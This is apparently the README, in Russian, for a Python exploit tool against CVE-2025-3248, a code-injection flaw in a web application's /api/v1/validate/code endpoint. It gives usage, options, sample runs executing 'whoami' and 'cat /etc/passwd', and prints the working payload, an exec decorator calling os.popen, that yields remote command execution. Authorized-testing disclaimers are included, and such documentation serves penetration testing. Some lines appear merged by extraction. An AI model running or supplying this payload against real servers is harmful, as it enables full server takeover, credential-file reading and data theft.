
Эксплойт на Python для CVE-2025-3248, уязвимости внедрения кода в веб-API. Выполняет произвольные системные команды через специально созданные полезные нагрузки для авторизованного тестирования на проникновение.
CVE-2025-3248 Документация инструмента эксплуатации уязвимости
Данный инструмент предназначен для использования уязвимости CVE-2025-3248 (уязвимость внедрения кода на Python) путем создания вредоносной полезной нагрузки для удаленного выполнения команд (RCE) на целевой сервере. Уязвимость существует в API-интерфейсе одного веб-приложения, позволяя злоумышленнику внедрять произвольный код Python через непроверенную точку выполнения кода.
Данный инструмент предназначен только для авторизованного тестирования безопасности. Неавторизованное тестирование на проникновение может нарушить закон. Убедитесь, что у вас есть явное разрешение на использование в целевой системе.
✅ Внедрение вредоносного кода Python через интерфейс /api/v1/validate/code
✅ Поддержка выполнения произвольных системных команд (например, whoami, ls)
✅ Настраиваемый тайм-аут (по умолчанию 10 секунд)
✅ Поддержка двух форматов вывода: текст/JSON
✅ Детальная обработка ошибок и вывод логов
python cve-2025-3248.py -t <целевой URL> -c "<команда>" [опции]
whoami (формат вывода по умолчанию)python cve-2025-3248.py -t http://192.168.1.100:7860 -c "whoami"
Пример вывода:
[+] Команда выполнена успешно
--------------------------------------------------
www-data
--------------------------------------------------
python cve-2025-3248.py -t https://app.example.com -c "cat /etc/passwd" -o json -v
Пример вывода:
{
"status": 200,
"content": "root:x:0:0:root:/root:/bin/bash\n...",
"success": true
}
code в интерфейсе /api/v1/validate/codeexec() для выполнения переданного кода Pythonimport os
@exec("raise Exception(os.popen('whoami').read())")
def f():
pass
os.popen() для выполнения системных командДанная уязвимость может привести к полному контролю над сервером: злоумышленник может выполнять произвольные системные команды, похищать конфиденциальные данные, устанавливать бэкдоры и т.д.
⚠️ Данный инструмент предназначен только для авторизованного тестирования на проникновение ⚠️
Рекомендации:
-v для просмотра подробных логов, чтобы избежать ошибочных действийrequests (необходимо установить заранее)pip install requests
/api/v1/validate/codeexec/eval и т.д.)Данный документ предназначен только для целей безопасности и образования. Автор не несет ответственности за любые прямые или косвенные убытки, возникшие в результате использования данного инструмента. Обязательно соблюдайте законы и нормативные акты и используйте инструменты безопасности на законных основаниях.
| Параметр | Обязательно | Описание |
|---|
-t, --target | Да | Целевой URL (формат: http://ip:port) |
-c, --command | Да | Системная команда для выполнения (заключается в кавычки) |
-o, --output | Нет | Формат вывода (text/json, по умолчанию text) |
--timeout | Нет | Время ожидания запроса (сек, по умолчанию 10) |
-v, --verbose | Нет | Отображение подробного журнала выполнения |
| Код ошибки | Причина | Решение |
|---|
[-] Неверный формат целевого URL | В URL отсутствует схема или хост | Проверьте формат URL (например, http://127.0.0.1:8080) |
[-] Тайм-аут запроса | Целевой сервер не отвечает вовремя | Увеличьте значение параметра --timeout |
[-] Ошибка подключения | Цель недоступна / заблокирована файрволом | Проверьте сетевое соединение |
[-] Ошибка выполнения команды. HTTP-статус: 403 | Отказ в разрешении на стороне сервера | Убедитесь, что целевой сервис разрешает выполнение кода |